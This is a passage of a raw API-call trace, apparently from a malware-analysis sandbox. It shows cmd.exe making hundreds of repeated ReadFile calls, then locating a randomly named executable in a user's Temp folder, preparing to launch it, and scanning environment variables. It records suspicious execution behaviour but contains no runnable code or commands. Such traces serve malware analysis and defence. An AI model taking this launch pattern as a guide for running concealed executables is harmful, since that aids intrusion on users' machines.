lpNumberOfBytesRead=0x18e4ec, 
lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.175] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.176] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, 
lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile 
(in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.177] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 
[0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.178] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, 
lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.179] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.216] _close (_FileHandle=4) returned 0 [0174.216] FindNextFileW (in: hFindFile=0x320f58, lpFindFileData=0x18f560 | out: lpFindFileData=0x18f560) returned 0 [0174.217] GetLastError () returned 0x12 [0174.217] FindClose (in: hFindFile=0x320f58 | out: hFindFile=0x320f58) returned 1 [0174.217] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0174.219] _close (_FileHandle=3) returned 0 
[0174.219] GetConsoleTitleW (in: lpConsoleTitle=0x18f9fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.219] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe\"")) returned 0xffffffff [0174.219] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0174.219] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0174.219] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0174.219] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0174.219] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0174.219] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0174.219] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0174.219] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0174.219] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0174.220] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0174.220] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0174.220] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0174.220] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0174.220] _wcsicmp 
(_String1="\"C", _String2="VERIFY") returned -84 [0174.220] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0174.220] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0174.220] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0174.220] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0174.220] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0174.220] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0174.220] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0174.220] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0174.220] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0174.220] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0174.220] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0174.220] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0174.220] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0174.220] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0174.220] _wcsicmp (_String1="\"C", _String2="PAUSE") 
returned -78 [0174.220] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0174.220] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0174.221] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0174.221] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0174.221] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0174.221] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0174.221] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0174.221] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0174.221] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0174.221] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0174.221] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0174.221] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0174.221] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0174.221] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0174.221] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0174.221] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0174.221] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0174.221] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0174.221] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0174.221] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0174.221] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0174.221] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0174.221] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0174.221] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0174.221] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0174.221] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0174.221] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0174.221] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0174.221] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0174.221] _wcsicmp 
(_String1="\"C", _String2="MKLINK") returned -75 [0174.221] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0174.221] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0174.221] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0174.221] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0174.221] SetErrorMode (uMode=0x0) returned 0x0 [0174.221] SetErrorMode (uMode=0x1) returned 0x0 [0174.221] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3304a0, lpFilePart=0x18f51c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x18f51c*="Temp") returned 0x23 [0174.222] SetErrorMode (uMode=0x0) returned 0x1 [0174.222] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0174.222] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0174.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.225] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", fInfoLevelId=0x1, lpFindFileData=0x18f2b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2b8) returned 0x320f58 [0174.225] FindClose (in: hFindFile=0x320f58 | out: hFindFile=0x320f58) returned 1 [0174.225] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0174.225] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0174.225] GetConsoleTitleW (in: lpConsoleTitle=0x18f790, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.225] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f618, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f6e0 | out: lpAttributeList=0x18f618, lpSize=0x18f6e0) returned 1 [0174.225] UpdateProcThreadAttribute (in: lpAttributeList=0x18f618, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f6d8, 
cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f618, lpPreviousValue=0x0) returned 1 [0174.225] GetStartupInfoW (in: lpStartupInfo=0x18f5d4 | out: lpStartupInfo=0x18f5d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.225] _wcsnicmp (_String1="COPYCMD", 
